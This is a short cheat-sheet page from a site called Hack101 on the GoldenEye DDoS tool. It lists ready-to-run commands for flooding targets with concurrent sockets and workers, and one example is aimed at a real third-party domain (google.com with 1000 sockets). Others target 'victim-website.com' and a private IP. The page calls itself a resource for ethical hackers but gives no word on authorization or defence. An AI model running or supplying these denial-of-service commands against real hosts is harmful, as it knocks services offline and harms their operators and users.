Hack101

GoldenEye Cheat Sheet

GoldenEye is a powerful and effective tool for performing DDOS attacks.

Contributors

  • mdobydullah

Share

Usage

  • Display all the options.

    ./goldeneye.py -h
  • Perform DDoS attack on any domain. ‘s’ is used to specify no. of concurrent sockets.

    ./goldeneye.py https://www.google.com -s 1000
  • send traffic in ‘random’ mode with 5 workers running 10 connections each.

    ./goldeneye.py  http://192.168.0.233:80/ -s 10 -m random
  • Workers (-w), sockets (-s) and method (-m)

    ./goldeneye.py victim-website.com -w 100 -s 70 -m post

About

The goal of Hack101 is to build a big cheatsheet platform for ethical hackers, and cybersecurity researchers. It is an open-source project and anyone can contribute to it.

Sponsor